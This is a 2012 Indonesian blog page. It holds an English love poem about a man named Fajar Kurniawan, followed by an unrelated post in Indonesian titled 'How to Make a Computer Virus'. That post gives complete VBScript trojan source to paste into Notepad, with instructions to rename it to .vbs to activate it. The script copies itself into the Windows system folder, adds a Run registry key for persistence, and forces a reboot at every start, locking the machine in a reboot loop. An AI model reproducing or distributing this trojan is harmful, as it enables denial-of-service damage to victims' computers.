Friday, November 23, 2012

Kata Asti Damayanti

My Soulmates

 
He is stubborn
He has spongebob's tooth
Always call me "bunda"
Audible really soft 
Like breeze in the hot day

He's like a cup of hot tea in the pouring rain
He's like blanket when I feel cold
He's black when other white
He's quick to realize everything

He never promise me many high dreams
He's not romantic
He's never defend me when I get mistake
it's make me wanna cry

But, he's true
There's couple not only to defend us when we wrong
Not romantic but in every word of his said,
I can read a patency
That he never can distinct from me
That's make me flattered

Possible this is destiny
How womanizer can be right just because of me?
He's the best Poet although without words
make me in the pink everytime

my best inspiration
more than just diamond
more than just gold
more than just purple rose
his name is FAJAR KURNIAWAN

Cara Membuat Virus Komputer

Apa kabar Kawan? Maaf baru muncul lagi nih, Kali ini Saya mau berbagi pengetahuan sama kalian semua yang lagi belajar membuat Virus komputer lewat notepad.
Cara ini sangat mudah kok tinggal copy paste aja di notepad, tapi saya harap jangan di salah gunakan ya, kalau mau mencoba di komputer sendiri tapi resikonya ditangung sendiri.
nah langsung saja dicopy semua ya lalu paste di notepad lalu save.



rem - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)

createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"

sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub

set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close

set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")

set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem()

function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function

function rebootSystem()
strComputer = "."

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function

 Perhatian : kalau mau mengaktifkan virus tersebut ganti exstensi.txt menjadi exstensi.vbs.
Contohnya : fajar-kurniawan.vbs
 Jika tidak digunakan biarkan tulisannya fajar-kurniawan.txt
Nah mudah kan? Apa bila masih bingung atau ada yang mau ditanyakan silahkan tingalkan pesan terimakasih.